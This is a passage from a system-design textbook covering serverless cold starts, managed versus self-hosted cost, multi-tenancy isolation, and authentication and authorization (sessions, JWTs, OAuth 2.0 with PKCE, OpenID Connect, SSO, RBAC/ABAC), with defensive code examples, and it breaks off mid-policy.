The init phase is the part you control, and it is usually the largest. Every import, every SDK client constructed at module scope, and every configuration fetch happens before the first request is served. Reducing dependencies, lazily constructing clients that only some code paths need, and avoiding network-dependent initialization all cut cold-start time directly.
import os
# ---- module scope: paid on EVERY cold start --------------------------------
# Constructing a client is cheap; its first network call is not. Construct
# eagerly (so warm calls reuse it), but never make network calls at import.
s3 = make_s3_client() # no I/O yet
_analytics = None # only some requests need this
def analytics():
global _analytics
if _analytics is None: # lazily built: cold path unaffected
_analytics = make_analytics_client()
return _analytics
# Anti-pattern: fetching secrets at import time adds a full round trip to the
# cold start of every environment, on every scale-up.
# SECRET = secrets_manager.get("db-password") # DON'T
# Prefer an injected environment variable, or fetch on first use and cache.
def handler(event, context):
...
Concurrency, not requests per second, is the quantity that determines how many environments exist — and Little's Law converts between them. A function averaging 200 ms at 500 rps needs about 100 concurrent environments; if traffic doubles instantly, 100 more must be cold-started, and every one of those requests pays the cold-start penalty.
def concurrency(rps, avg_seconds):
return rps * avg_seconds # Little's Law: L = lambda * W
print(concurrency(500, 0.200)) # 100.0 environments in steady state
print(concurrency(500, 1.500)) # 750.0 <- slow handlers cost
# concurrency, and concurrency
# is what hits the account limit
def cold_start_share(rps, avg_s, spike_factor, cold_ms, warm_ms):
steady = concurrency(rps, avg_s)
new_envs = steady * (spike_factor - 1) # environments to create
reqs_in_spike = rps * spike_factor * avg_s
cold_frac = min(1.0, new_envs / reqs_in_spike)
p_avg = cold_frac * cold_ms + (1 - cold_frac) * warm_ms
return round(cold_frac * 100, 1), round(p_avg, 1)
print(cold_start_share(500, 0.2, 2.0, 370, 20)) # (50.0, 195.0)
# During an instant doubling, half the requests are cold and the average
# latency is 10x normal. THAT is what users experience during a flash sale --
# and why provisioned/warm concurrency exists.
The mitigations, in order of preference: reduce init work (cheapest and helps everywhere), choose a fast runtime for latency-sensitive functions, provisioned concurrency to keep N environments permanently warm (removes cold starts and removes the scale-to-zero cost benefit for those N), and snapshot-based restore where the platform offers it.
Concurrency limits also serve as a blast-radius control. Account-level limits are shared across functions, so one runaway function can starve the others — reserving concurrency per function both guarantees capacity to the important ones and caps the damage a buggy loop can do, including to the databases downstream.
Key Takeaways
- Cold start = sandbox + runtime + your init; the init phase is the part you control and usually the largest.
- Never do network I/O at module scope; construct clients eagerly but fetch lazily and cache.
- Concurrency, not RPS, determines environment count: L = rps x duration, so slow handlers multiply concurrency and hit limits sooner.
- Traffic spikes force mass cold starts, so average latency degrades exactly when load is highest; provisioned concurrency is the direct fix.
- Per-function concurrency reservations both guarantee capacity and cap the blast radius of a runaway function.
🧪 Practice
- Compute the steady-state concurrency for 2,000 rps at 150 ms, then at 600 ms, and say what breaks first as duration grows.
- Take a handler with heavy module-scope initialization and restructure it into eager-construct/lazy-connect, listing what you moved and why.
- Interview: Your p99 latency is fine at steady load and terrible during spikes. What is happening and what are your options? (Hint: think about how many new execution environments a spike requires and what each one costs.)
Managed Services vs. Self-Hosted
Every architecture makes a series of buy-versus-run decisions: managed Postgres or your own, hosted Kafka or a self-run cluster, a search service or an Elasticsearch cluster you operate. The decision is usually framed as cost, which is why it is usually made badly — the sticker price of a managed service is visible while the cost of running the alternative is spread across salaries, on-call, and the features you did not build.
The honest comparison is total cost of ownership over the expected lifetime, including the parts nobody itemizes: initial setup, upgrades and patching, backup and verified restore, capacity planning, security review, the on-call burden, and the opportunity cost of engineers doing this instead of product work.
# TCO comparison over a year -- with the invisible costs made visible.
ENG_HOUR = 100 # loaded cost of an engineer-hour
def self_hosted(instances, hourly, setup_h, monthly_ops_h, incidents, hours_each):
infra = instances * hourly * 24 * 365
labour = (setup_h + monthly_ops_h * 12 + incidents * hours_each) * ENG_HOUR
return infra + labour
def managed(monthly_fee, monthly_ops_h, incidents, hours_each):
labour = (monthly_ops_h * 12 + incidents * hours_each) * ENG_HOUR
return monthly_fee * 12 + labour
# A 3-node Kafka cluster, sized identically both ways.
diy = self_hosted(instances=3, hourly=0.34, setup_h=120,
monthly_ops_h=16, incidents=4, hours_each=8)
svc = managed(monthly_fee=1800, monthly_ops_h=2, incidents=1, hours_each=4)
print(f"self-hosted ${diy:,.0f} managed ${svc:,.0f}")
# self-hosted $47,133 managed $24,400
#
# Infrastructure is $8,900 of the self-hosted total; the other $38,000 is
# people. Any comparison that comes out strongly in favour of self-hosting has
# usually priced the servers and forgotten the engineers.
The calculation flips in specific, recognizable situations, and those are the ones worth naming rather than arguing from principle.
| Prefer managed when | Prefer self-hosted when |
|---|---|
| The component is generic (see subdomains, 10.2) | It is your core differentiator |
| The team is small or has no relevant expertise | You have deep in-house expertise already |
| Time to market matters more than unit cost | Scale makes the managed premium enormous |
| The workload is spiky or unpredictable | Load is steady and predictable |
| Compliance is satisfied by the provider | Regulation forbids the provider or the region |
| You need it working next week | You need control the service does not expose |
The real risk of managed services is lock-in, and the useful response is to size it rather than to fear it. Ask what a migration would actually cost: a managed Postgres is standard Postgres, so the exit is a dump and restore. A proprietary serverless database with a bespoke query API may have no equivalent anywhere, so the exit is a rewrite. Depend freely on the first kind; depend on the second only where the payoff is large and deliberate, and keep the coupling behind a port (10.1) so the blast radius of a change is one adapter.
A final decision rule that resolves most arguments: run it yourself only if operating it well is something your business should be good at. Nobody wins customers by patching Kafka brokers.
Key Takeaways
- Compare total cost of ownership, not sticker price; labour usually dominates the self-hosted side.
- Managed services suit generic subdomains, small teams, spiky load, and speed to market; self-hosting suits core differentiators, deep expertise, steady scale, and hard regulatory constraints.
- Price lock-in concretely by asking what an exit would cost — standard-protocol services are cheap to leave, proprietary APIs are not.
- Hide proprietary dependencies behind a port so a change touches one adapter.
- Run it yourself only if operating it well is a thing your business should be good at.
🧪 Practice
- Build a TCO model for one component in your stack with explicit setup, monthly ops, and incident-hour assumptions, then find the break-even scale.
- For one managed dependency, write the exit plan and estimate its cost in engineer-weeks.
- Interview: When is it right to run your own database? (Hint: think about expertise, scale economics, and whether the constraint is regulatory or merely a preference for control.)
Multi-Tenancy Models
Multi-tenancy is serving many customers (tenants) from shared infrastructure. The architectural decision is where the isolation boundary sits, and it ranges from a shared row-level model to a full stack per tenant. The choice affects cost per tenant, blast radius, compliance posture, and how hard it is to give one large customer special treatment — so it is genuinely difficult to change later.
SHARED EVERYTHING SCHEMA PER TENANT STACK PER TENANT
+---------------------+ +---------------------+ +------+ +------+
| one app cluster | | one app cluster | | app | | app |
+---------------------+ +---------------------+ +------+ +------+
| one database | | db: schema_a | | db_a | | db_b |
| rows tagged with | | schema_b | +------+ +------+
| tenant_id | | schema_c | tenant A tenant B
+---------------------+ +---------------------+
cheapest per tenant middle ground most expensive
one bad query -> all per-tenant backup/ strongest isolation
hardest isolation restore possible N deploys to manage
| Model | Cost/tenant | Isolation | Per-tenant restore | Scale limit |
|---|---|---|---|---|
| Shared schema (row) | Lowest | Weakest | Hard | Thousands+ of tenants |
| Schema per tenant | Low-medium | Medium | Straightforward | Hundreds to low thousands |
| Database per tenant | Medium-high | Strong | Trivial | Hundreds |
| Stack per tenant | Highest | Strongest | Trivial | Tens |
In the shared model, everything depends on the tenant filter being present on every query, and "every developer remembers" is not a control. The enforcement must be structural — row-level security in the database, or a repository layer that makes an unfiltered query impossible to express.
-- Structural isolation: the DATABASE enforces the filter, not the application.
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
CREATE POLICY tenant_isolation ON documents
USING (tenant_id = current_setting('app.tenant_id')::uuid);
-- The application sets the tenant once per request/transaction:
SET LOCAL app.tenant_id = '3f2b...';
-- Now a forgotten WHERE clause returns this tenant's rows only:
SELECT * FROM documents; -- implicitly filtered by the policy
-- A cross-tenant leak now requires bypassing RLS deliberately, rather than
-- forgetting a clause during a rushed Friday change.
# The "noisy neighbour" problem: shared infrastructure means one tenant's
# workload can consume capacity others need. Fairness must be explicit.
def admit(tenant_id, quotas, usage):
q = quotas.get(tenant_id, quotas["default"])
if usage.concurrent(tenant_id) >= q["max_concurrent"]:
raise TooManyRequests(tenant_id) # cap concurrency per tenant
if usage.rate(tenant_id) >= q["rps"]:
raise RateLimited(tenant_id) # cap throughput per tenant
return True
QUOTAS = {
"default": {"rps": 50, "max_concurrent": 10},
"enterprise_7": {"rps": 2000, "max_concurrent": 200}, # paid tier
}
# Without per-tenant quotas, one customer's batch import degrades everyone
# else's latency, and your SLO is effectively set by your worst-behaved user.
Three cross-cutting concerns follow from any shared model. Every log line, metric, and trace should carry the tenant ID, because otherwise you cannot answer "is this slow for everyone or for one customer?". Migrations must be planned per model — one shared schema means one migration for everyone and no staged rollout, while schema-per-tenant means a migration runner that handles partial failure across hundreds of schemas. And tiering is legitimate: the common mature pattern is a shared pool for most tenants plus dedicated stacks for the few large or regulated ones, which keeps the cost curve sane while satisfying the customers who will pay for isolation.
Key Takeaways
- The multi-tenancy decision is where the isolation boundary sits, and it trades cost per tenant against blast radius and compliance posture.
- Shared-schema isolation must be enforced structurally — row-level security or a repository that cannot express an unfiltered query.
- Noisy neighbours are guaranteed without explicit per-tenant quotas on rate and concurrency.
- Tag all telemetry with tenant ID; without it you cannot separate a customer problem from a system problem.
- Migration strategy differs sharply per model, and a hybrid — shared pool plus dedicated stacks for large or regulated tenants — is the common mature answer.
🧪 Practice
- Choose a tenancy model for a B2B SaaS with 5,000 small customers and 10 enterprise customers, and justify the split.
- Implement row-level security for one table and write a test proving a missing
WHEREclause cannot leak another tenant's rows.- Interview: One tenant's bulk import is degrading latency for everyone. What do you change? (Hint: think about what limits exist per tenant today, and where you would enforce a new one without deploying to every service.)
<a id="11-security-privacy-and-compliance"></a>
11. Security, Privacy, and Compliance
Security is not a component you add to a system but a property that emerges from a thousand design decisions, and the expensive ones are structural: where trust boundaries sit, who holds the keys, what data you chose to collect. This chapter covers how identity is established and enforced across services, how data is protected in transit and at rest, the threat classes worth designing against, and the privacy and regulatory constraints that increasingly dictate where data may live and how long you may keep it.
<a id="111-authentication-and-authorization"></a>
11.1 Authentication and Authorization
Authentication answers "who are you?" and authorization answers "what may you do?" — two separate questions that a surprising number of breaches come from conflating. This subchapter covers how identity is established, carried across a distributed system, and turned into access decisions.
Session-Based vs. Token-Based Auth
After a user proves who they are once, every subsequent request has to carry proof of that fact, because HTTP itself remembers nothing. There are two ways to do it, and the difference is where the truth lives.
Session-based authentication keeps the state on the server. Login creates a session record, and the client receives an opaque session ID in a cookie. Each request looks the session up, so the server always knows the current truth — and revoking access is a single delete. Token-based authentication keeps the state in the token itself: the server signs a document containing the user's identity and claims, and the client presents it. No lookup is needed, because the signature proves the contents were not tampered with.
The analogy that makes it stick: a session ID is a coat-check ticket — a meaningless number that only works because the cloakroom holds the coat. A signed token is a passport — self-describing, verifiable by anyone with the issuer's public key, and impossible to un-issue once it is in someone's hand.
SESSION (stateful) TOKEN (stateless)
login login
| |
v v
store session in Redis sign a JWT with the user's claims
| sid = "a7f3..." | eyJhbGci...<payload>...<sig>
v v
Set-Cookie: sid=a7f3 return the token to the client
request request
Cookie: sid=a7f3 Authorization: Bearer eyJ...
| |
v v
GET session from Redis <-- lookup verify signature <-- no lookup
| (network hop, must be up) | (local, microseconds)
v v
always current truth truth as of ISSUE time
revoke = DELETE (instant) revoke = hard (see below)
import time, jwt # PyJWT
import secrets
# ---- SESSION: the server holds the truth -----------------------------------
def login_session(user, store, response):
sid = secrets.token_urlsafe(32) # opaque, unguessable
store.setex(f"sess:{sid}", 3600, {"user_id": user.id, "roles": user.roles})
response.set_cookie("sid", sid,
httponly=True, # JavaScript cannot read it -> XSS-safer
secure=True, # HTTPS only
samesite="Lax") # blocks most CSRF (see 11.3)
def authenticate_session(request, store):
sid = request.cookies.get("sid")
session = store.get(f"sess:{sid}") if sid else None
return session # None once deleted: revocation is immediate
def logout_session(sid, store):
store.delete(f"sess:{sid}") # instantly effective
# ---- TOKEN: the token holds the truth --------------------------------------
def login_token(user, private_key):
now = int(time.time())
return jwt.encode({
"sub": str(user.id),
"roles": user.roles,
"iat": now,
"exp": now + 900, # 15 minutes: short, because you CANNOT revoke
"iss": "auth.example.com",
"aud": "api.example.com",
}, private_key, algorithm="RS256")
def authenticate_token(request, public_key):
raw = request.headers["Authorization"].removeprefix("Bearer ")
# Verification is local: no database, no network, no shared state.
return jwt.decode(raw, public_key, algorithms=["RS256"],
audience="api.example.com", issuer="auth.example.com")
The trade is revocation versus scale. A session can be killed instantly but every request costs a lookup, and every service needs reach into the session store. A token verifies locally at any scale but stays valid until it expires — a fired employee's token works until the clock runs out. The standard resolution is a hybrid: short-lived access tokens (5–15 minutes) plus a long-lived refresh token that is stateful and revocable, so the worst-case exposure is one access-token lifetime.
| Property | Session (stateful) | Token (stateless) |
|---|---|---|
| Where truth lives | Server store | Inside the token |
| Per-request cost | A store lookup | Signature verification (local) |
| Revocation | Immediate | Only at expiry, or via a denylist |
| Horizontal scaling | Needs a shared store | Nothing shared |
| Cross-domain / mobile | Cookies get awkward | Natural (Authorization header) |
| Payload visibility | Nothing exposed | Claims readable by the client |
| Typical use | Server-rendered web apps | APIs, SPAs, service-to-service |
One decision is independent of the above and often gotten wrong: where the
browser stores the credential. A cookie with HttpOnly cannot be read by
injected JavaScript, which is the main defence against XSS-driven theft; a token
in localStorage can be read by any script on the page. Storing a JWT in an
HttpOnly cookie combines the token model with the safer storage, at the cost of
needing CSRF protection again.
Key Takeaways
- Sessions keep truth on the server (instant revocation, per-request lookup); tokens carry truth in a signed payload (local verification, no shared state).
- The trade is revocation versus scale — hybrids use short access tokens plus a revocable refresh token to get both.
- Token lifetime is your revocation window; choose it as a security decision, not a convenience one.
HttpOnlycookies protect the credential from XSS;localStoragedoes not.- Cookie-based schemes need CSRF defences (
SameSite, tokens); header-based schemes largely do not.
🧪 Practice
- Implement login and logout both ways for a small API and measure the per-request cost difference under load.
- Design a revocation strategy for a stateless token system that keeps the worst-case exposure under five minutes without a lookup on every request.
- Interview: A user clicks "log out everywhere" in a JWT-based system. What actually has to happen? (Hint: think about what the server can and cannot take back, and what state you would have to reintroduce.)
JWT Structure and Pitfalls
A JSON Web Token is three base64url-encoded parts joined by dots: a header describing the algorithm, a payload of claims, and a signature over the first two. Understanding the structure matters because almost every JWT vulnerability comes from misunderstanding what the signature does and does not guarantee.
The signature guarantees integrity and authenticity — the contents have not been altered and were issued by someone holding the key. It guarantees nothing about confidentiality: the payload is encoded, not encrypted, and anyone holding the token can read every claim. Putting a national ID number or an internal database URL in a JWT publishes it to the client.
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9 . eyJzdWIiOiIxMiIsImV4cCI6MTc... . SflKxw...
|________________________________| |______________________| |________|
HEADER PAYLOAD SIGNATURE
{"alg":"RS256","typ":"JWT", {"sub":"12","exp":..., over
"kid":"2026-08"} "roles":["admin"]} header.payload
base64url, NOT encrypted ------------------^
anyone can decode and read the claims; only the key holder can FORGE them
import jwt, time
# ---- Verification done correctly -------------------------------------------
def verify(token, public_key):
return jwt.decode(
token,
public_key,
algorithms=["RS256"], # PIN the algorithm: never trust header.alg
audience="api.example.com", # is this token FOR me?
issuer="auth.example.com", # did someone I trust issue it?
options={"require": ["exp", "iat", "sub", "aud", "iss"]},
)
# Libraries validate `exp` by default -- but only if you let them, and only
# if the claim is present. Requiring it explicitly closes that gap.
# ---- The classic vulnerabilities, and why they work ------------------------
# 1. ALGORITHM CONFUSION: the attacker rewrites the header to {"alg":"none"}
# and strips the signature. A library called as jwt.decode(token, verify=False)
# or one that reads alg from the header will accept it.
# FIX: always pass an explicit `algorithms=[...]` allowlist.
#
# 2. RS256 -> HS256 DOWNGRADE: the attacker changes alg to HS256 and signs with
# the PUBLIC key as the HMAC secret. A naive verifier that "uses the key from
# config with whatever algorithm the header says" validates it happily.
# FIX: same allowlist -- the two families must never be interchangeable.
#
# 3. NO EXPIRY CHECK: a token without `exp`, or a verifier that skips it, never
# stops working.
# FIX: require `exp` and keep lifetimes short.
#
# 4. NO AUDIENCE CHECK: a token minted for the analytics API is replayed against
# the payments API. Both trust the same issuer, so the signature is valid.
# FIX: every service verifies `aud` matches itself.
Key rotation is the operational half of the story. The header's kid (key ID)
lets an issuer publish several public keys at once via a JWKS endpoint, so a new
signing key can be introduced while tokens signed by the old one are still in
flight.
// GET https://auth.example.com/.well-known/jwks.json
{
"keys": [
{ "kid": "2026-08", "kty": "RSA", "alg": "RS256", "use": "sig",
"n": "0vx7...", "e": "AQAB" },
{ "kid": "2026-05", "kty": "RSA", "alg": "RS256", "use": "sig",
"n": "sXch...", "e": "AQAB" }
]
}
// Verifiers cache this, select by the token's `kid`, and refetch on an unknown
// kid (with a rate limit -- an unbounded refetch is a denial-of-service lever).
// Rotation: publish the new key, wait one max-token-lifetime, then sign with
// it, wait again, then remove the old key. Never flip in one step.
Two design rules round it out. Keep tokens small: they ride on every request, and a 4 KB token of embedded permissions costs bandwidth on every call and can overflow header limits. Put an identity and coarse roles in the token, and look up fine-grained permissions server-side. And use asymmetric signing (RS256/ES256) between services: with HS256 every verifier needs the secret, which means every verifier can also mint tokens — a single compromised read-only service becomes an identity forge.
Key Takeaways
- A JWT is signed, not encrypted: claims are world-readable, so never put secrets in the payload.
- Always pass an explicit algorithm allowlist;
alg: noneand RS256→HS256 downgrade are the classic forgeries.- Verify
exp,aud, andisson every service — a valid signature alone does not mean the token was meant for you.- Use
kidplus a JWKS endpoint so keys can rotate with overlap; never flip keys in one step.- Prefer asymmetric signing so verifiers cannot mint tokens, and keep payloads small.
🧪 Practice
- Decode a JWT by hand (base64url) and list every claim; identify anything you would not want a client to read.
- Write a verifier that rejects
alg: none, a wrong audience, and an expired token, with a distinct test for each.- Interview: How do you rotate a JWT signing key with zero downtime? (Hint: think about tokens already in flight, and what the verifier must be able to do before the signer changes.)
OAuth 2.0 Flows
OAuth 2.0 is an authorization delegation framework, not a login protocol. It exists to answer one question: how can an application get limited access to a user's data on another service without the user handing over their password? Before OAuth, "connect your Gmail" meant typing your Google password into a third party — which gave it everything, forever, and made password rotation break every integration.
OAuth's answer is to route the user to the service that already knows them, have them approve a specific, limited scope, and return a token to the application that grants only that. Four roles: the resource owner (the user), the client (the app requesting access), the authorization server (issues tokens), and the resource server (holds the data).
AUTHORIZATION CODE FLOW WITH PKCE -- the default for essentially all clients
user client app authorization server resource server
| | | |
| "connect" | | |
|----------->| generate code_verifier | |
| | challenge = S256(verifier) |
| redirect with client_id, scope, redirect_uri, code_challenge |
|<-----------|------------------------->| |
| log in + consent screen | |
|-------------------------------------->| |
| redirect back with ?code=abc123 | |
|<--------------------------------------| |
|----------->| | |
| | POST /token | |
| | code=abc123 | |
| | code_verifier=<origin> | <-- proves the SAME client
| |------------------------->| that started the flow
| | access_token (+refresh)| is redeeming the code
| |<-------------------------| |
| | GET /data Authorization: Bearer <access_token> |
| |--------------------------------------------------->|
The code travels through the browser (interceptable); the token never does.
PKCE makes an intercepted code useless without the verifier.
import hashlib, base64, secrets, requests
# ---- Step 1: the client starts the flow ------------------------------------
verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
challenge = base64.urlsafe_b64encode(
hashlib.sha256(verifier.encode()).digest()).rstrip(b"=").decode()
state = secrets.token_urlsafe(16) # CSRF defence for the redirect
authorize_url = (
"https://auth.example.com/authorize"
f"?response_type=code&client_id={CLIENT_ID}"
f"&redirect_uri={REDIRECT_URI}"
"&scope=contacts.read" # ask for the LEAST you need
f"&state={state}&code_challenge={challenge}&code_challenge_method=S256"
)
# Store `verifier` and `state` in the user's session, then redirect.
# ---- Step 2: the callback, after the user consents -------------------------
def callback(request, session):
if request.args["state"] != session["state"]:
raise SecurityError("state mismatch") # someone else started this flow
resp = requests.post("https://auth.example.com/token", data={
"grant_type": "authorization_code",
"code": request.args["code"],
"redirect_uri": REDIRECT_URI,
"client_id": CLIENT_ID,
"code_verifier": session["verifier"], # the PKCE proof
})
return resp.json() # {"access_token": ..., "refresh_token": ..., "expires_in": 3600}
The grant types that remain current, and what each is for:
| Grant | Use it for | Notes |
|---|---|---|
| Authorization code + PKCE | Web apps, SPAs, mobile — the default | PKCE now recommended even with a secret |
| Client credentials | Machine-to-machine, no user involved | The service is the resource owner |
| Device code | TVs, CLIs, input-constrained devices | User authorizes on a second device |
| Refresh token | Getting a new access token silently | Rotate on use; detect reuse |
| Implicit (deprecated) | — | Returned tokens in the URL; do not use |
| Password grant (deprecated) | — | Requires handing over the password |
Three practical rules cause most of the real-world failures when ignored. Redirect URIs must be exact-matched against a registered allowlist — wildcard or prefix matching lets an attacker redirect the code to a subdomain they control. Scopes should be minimal and granular, because a scope is the only thing limiting what the token can do. And refresh tokens should rotate on every use, with reuse of an old refresh token treated as theft and the whole chain revoked — the standard detection for a stolen refresh token.
Key Takeaways
- OAuth 2.0 delegates limited authorization; it is not an authentication protocol on its own (that is OIDC, next topic).
- Authorization code with PKCE is the correct default for every client type; implicit and password grants are deprecated.
- PKCE binds the authorization code to the client that started the flow, so an intercepted code is useless.
- Validate
stateagainst session state, and exact-match redirect URIs against a registered allowlist.- Request minimal scopes, keep access tokens short, and rotate refresh tokens with reuse detection.
🧪 Practice
- Implement the PKCE verifier/challenge pair and show that a mismatched verifier is rejected at the token endpoint.
- Design the scope set for a calendar integration that only needs to create events, and justify why each scope you excluded is unnecessary.
- Interview: Why is PKCE needed even for a confidential client with a secret? (Hint: think about where the authorization code travels and what else could be running on the user's device.)
OpenID Connect
OAuth 2.0 tells an application what it may access; it says nothing reliable about who the user is. Applications nonetheless tried to use it for login — "I got an access token for their profile, so they must be who they claim" — which is unsound. An access token is a bearer credential: it proves possession, not identity, and it can have been minted for a different application entirely.
OpenID Connect (OIDC) is a thin identity layer on top of OAuth 2.0 that fixes this by adding a second token with a precise meaning. The ID token is a JWT addressed to a specific client, describing an authentication event: this user, at this time, authenticated with this method, at this issuer. It is meant to be verified by the client, not sent anywhere.
OAuth 2.0 alone OpenID Connect
access_token ---> resource server access_token ---> resource server
(opaque, for the API) (unchanged: authorization)
"who is the user?" id_token ---> the CLIENT verifies it
-> call some /me endpoint, {
hope it belongs to this token "iss": "https://accounts.example.com",
"aud": "my-client-id", <- for ME
no standard, no guarantees "sub": "248289761001", <- stable ID
"auth_time": 1756200000,
"nonce": "n-0S6_WzA2Mj", <- replay guard
"email": "a@example.com",
"email_verified": true
}
+ a standard /userinfo endpoint
+ standard discovery + JWKS
import jwt, requests, secrets
# The nonce is generated before the redirect and stored in the session; it ties
# the returned ID token to THIS authentication request.
nonce = secrets.token_urlsafe(16)
authorize_url = (
"https://accounts.example.com/authorize"
f"?response_type=code&client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}"
"&scope=openid%20profile%20email" # `openid` is what makes it OIDC
f"&state={state}&nonce={nonce}&code_challenge={challenge}"
"&code_challenge_method=S256"
)
def verify_id_token(id_token, session, jwks_client):
key = jwks_client.get_signing_key_from_jwt(id_token).key # by `kid`
claims = jwt.decode(
id_token, key,
algorithms=["RS256"],
audience=CLIENT_ID, # MUST be my client_id, not another's
issuer="https://accounts.example.com",
)
if claims["nonce"] != session["nonce"]: # replay of an older id_token
raise SecurityError("nonce mismatch")
return claims
def local_user_key(claims):
# `sub` is the only stable identifier. Email changes, and two providers can
# report the same email for different people -- key your users on
# (issuer, sub), never on email alone.
return (claims["iss"], claims["sub"])
Discovery is the other practical contribution: every compliant provider exposes
/.well-known/openid-configuration listing its endpoints, supported scopes, and
JWKS URL, so integrating a new identity provider becomes configuration rather
than bespoke code.
| Token | Audience | Purpose | Sent to the API? |
|---|---|---|---|
| ID token | The client app | Proves an authentication event | No |
| Access token | The resource API | Grants scoped access | Yes |
| Refresh token | The auth server | Obtains new access tokens | No |
The single most common OIDC mistake is sending the ID token to backend APIs as if
it were an access token. It is addressed to the client (aud = client ID), so a
correctly implemented API must reject it — and an API that accepts it is skipping
audience validation, which is a vulnerability in itself.
Key Takeaways
- OIDC adds authentication to OAuth 2.0 via an ID token: a JWT addressed to the client describing an authentication event.
- An access token never proves identity; using one for login is unsound.
- Validate the ID token's signature,
iss,aud,exp, andnoncebefore trusting any claim in it.- Identify users by
(issuer, sub); email is mutable and not unique across providers.- Do not send ID tokens to APIs — an API that accepts one is not checking audience.
🧪 Practice
- Fetch a real provider's discovery document and map each endpoint to its role in the flow.
- Write ID token validation including the nonce check, and add a test that a replayed token from a previous login is rejected.
- Interview: A developer authenticates users by calling
/userinfowith an access token. What is wrong? (Hint: ask who that access token was issued to and how the app would know.)
Single Sign-On
Single sign-on lets a user authenticate once with a central identity provider and access many applications without logging in again. The motivation is partly convenience but mostly security and control: one place enforces MFA and password policy, one place logs every authentication, and one revocation — disabling the account — cuts access to every connected application at once. The alternative, per-application credentials, guarantees password reuse and leaves orphaned accounts behind every departure.
The mechanism is a trust relationship. Applications (service providers, or "relying parties") do not verify credentials themselves; they redirect to the identity provider (IdP), which authenticates the user and returns a signed assertion. The application trusts the assertion because it trusts the IdP's signing key.
SSO ACROSS APPLICATIONS
1. user -> app-A (no session)
2. app-A -> redirect to IdP
3. IdP: no IdP session -> prompt for credentials + MFA
4. IdP sets ITS OWN session cookie, signs an assertion, redirects back
5. app-A validates the assertion, creates its own local session
later, a different app:
6. user -> app-B (no session)
7. app-B -> redirect to IdP
8. IdP: session cookie already present -> NO prompt
9. signed assertion -> app-B creates its local session
The user "did not log in" to app-B. The IdP silently vouched for them.
Sessions in play: IdP session (the master) + one local session per app
Which is why logout is the hard part -->
# Single logout: the part every SSO deployment underestimates.
# Killing the IdP session does NOT kill the applications' local sessions.
def logout(user_id, idp_session, app_registry):
idp_session.destroy(user_id) # 1. no further silent SSO
# 2. Each application must be told, or its local session keeps working
# until it expires -- meaning the user is still logged in somewhere.
for app in app_registry.for_user(user_id):
try:
app.post("/backchannel-logout", { # OIDC back-channel logout
"logout_token": mint_logout_token(user_id, audience=app.client_id)
}, timeout=2)
except Exception:
# Best-effort by nature: an app that is down keeps its session.
# This is exactly why local sessions must ALSO be short-lived.
log.warn("logout_notify_failed", app=app.client_id)
# Design consequence: SSO does not remove the need for short session lifetimes.
# It centralizes authentication, not session termination.
The two protocol families in practice:
| Aspect | SAML 2.0 | OIDC |
|---|---|---|
| Format | XML assertions | JSON / JWT |
| Era and fit | Enterprise, long-established | Modern web, mobile, APIs |
| Transport | Browser POST bindings | Standard HTTP redirects + JSON |
| Mobile / SPA | Awkward | Native fit |
| Complexity | High (XML signatures, canonicalization) | Moderate |
| When to choose | Integrating enterprise IdPs that require it | Everything new |
Two structural risks come with centralization. The IdP becomes a single point of failure for all access — so it needs the highest availability tier in the estate, and applications need a documented break-glass path. And it becomes the highest-value target in the organization, since compromising it compromises everything; that is the argument for phishing-resistant MFA (WebAuthn/FIDO2), strict admin separation, and heavy monitoring on the IdP specifically.
Key Takeaways
- SSO centralizes authentication so MFA, policy, logging, and revocation happen in one place.
- Trust flows through a signed assertion; applications never see credentials.
- There is one IdP session plus one local session per application — SSO centralizes login, not logout.
- Single logout is best-effort; keep local sessions short so a failed notification has a bounded consequence.
- The IdP is both a single point of failure and the highest-value target: it needs top-tier availability, phishing-resistant MFA, and dedicated monitoring.
🧪 Practice
- Draw the redirect sequence for a user reaching a second application with an existing IdP session, marking every cookie involved.
- Design a logout flow that bounds "still logged in somewhere" to five minutes even when one application is unreachable.
- Interview: What happens to your entire estate if the IdP is down for an hour? (Hint: distinguish users with live sessions from users needing a new one, and consider what a break-glass path would have to bypass.)
RBAC and ABAC
Authorization models are how "what may you do?" gets answered consistently rather
than through scattered if statements. The two dominant models differ in what
the decision is based on: fixed roles, or arbitrary attributes evaluated at
request time.
Role-based access control (RBAC) assigns permissions to roles and roles to users. It is simple to reason about, easy to audit ("who can approve refunds?" is a query), and matches how organizations already describe themselves. Its limit is context: a role cannot express "during business hours", "only their own department's records", or "only below 10,000 euro".
Attribute-based access control (ABAC) evaluates a policy over attributes of the subject, the resource, the action, and the environment. It expresses those conditional rules naturally, at the cost of policies that are harder to audit — answering "who can access this document?" may require evaluating the policy against every user.
RBAC ABAC
user ----> role ----> permissions decision = f(subject, resource,
alice editor doc.read action, environment)
doc.write
allow if
"Can alice write docs?" subject.department == resource.owner_dept
-> is 'editor' in alice.roles and action == "read"
-> does 'editor' grant doc.write and env.time in business_hours
-> yes and resource.classification != "secret"
simple, auditable, coarse expressive, contextual, harder to audit
# ---- RBAC: a permission matrix, resolved by set membership -----------------
ROLE_PERMISSIONS = {
"viewer": {"doc.read"},
"editor": {"doc.read", "doc.write"},
"admin": {"doc.read", "doc.write", "doc.delete", "user.manage"},
}
def rbac_allows(user, permission):
return any(permission in ROLE_PERMISSIONS.get(r, set()) for r in user.roles)
# Cannot express: "editors may only edit documents in their own department",
# which is why real systems drift toward roles like `editor_finance_emea` --
# the role explosion that signals RBAC has been pushed past its limit.
# ---- ABAC: a policy evaluated against attributes at request time -----------
def abac_allows(subject, resource, action, env):
if subject["clearance"] < resource["classification_level"]:
return False # deny rules first
if action == "read":
return (resource["owner_dept"] == subject["dept"]
or resource["visibility"] == "org_wide")
if action == "write":
return (resource["owner_id"] == subject["id"]
and env["hour"] in range(8, 20) # contextual condition
and env["network"] == "corporate")
if action == "approve":
return ("approver" in subject["roles"]
and resource["amount"] <= subject["approval_limit"]) # data-driven
return False # default deny
Most mature systems use both: RBAC for coarse capability ("can this person approve refunds at all?") and attribute conditions for the fine-grained constraints ("up to their limit, in their region"). Two further variants are worth knowing: ReBAC (relationship-based, as in "can view because they are a member of the parent folder's group") which fits document and collaboration systems, and policy-as-code engines that externalize the rules entirely.
# Policy as code (OPA/Rego): rules live outside the application and are
# versioned, tested, and deployed independently of the service.
package authz
default allow := false
allow if { # coarse capability from RBAC
"approver" in input.subject.roles
input.action == "approve"
input.resource.amount <= input.subject.approval_limit
}
allow if {
input.action == "read"
